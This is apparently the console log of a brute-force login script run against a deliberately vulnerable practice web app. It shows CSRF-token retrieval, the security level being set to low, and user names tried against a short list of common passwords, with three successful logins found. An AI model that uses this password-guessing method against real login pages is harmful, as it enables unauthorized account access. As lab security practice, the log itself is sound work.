Login page token check...
Found token: True
Attempting login admin:password ...
Respuesta tras login (status): 200
Security set to low, cookies: {'PHPSESSID': '3vjsous5nfnh1ti6feo36jhf96', 'security': 'low'}
✅ admin:password -> welcome_text status=200
❌ admin:123456
❌ admin:admin
❌ admin:letmein
❌ admin:1234
❌ admin:root
❌ admin:test
❌ pablo:password
❌ pablo:123456
❌ pablo:admin
✅ pablo:letmein -> welcome_text status=200
❌ pablo:1234
❌ pablo:root
❌ pablo:test
❌ 1337:password
❌ 1337:123456
❌ 1337:admin
❌ 1337:letmein
❌ 1337:1234
❌ 1337:root
❌ 1337:test
❌ gordonb:password
❌ gordonb:123456
❌ gordonb:admin
❌ gordonb:letmein
❌ gordonb:1234
❌ gordonb:root
❌ gordonb:test
✅ smithy:password -> welcome_text status=200
❌ smithy:123456
❌ smithy:admin
❌ smithy:letmein
❌ smithy:1234
❌ smithy:root
❌ smithy:test
❌ test:password
❌ test:123456
❌ test:admin
❌ test:letmein
❌ test:1234
❌ test:root
❌ test:test
Done in 1.2275636196136475 s. Found: 3
Saved found_csrf.txt
Logs saved in logs_csrf
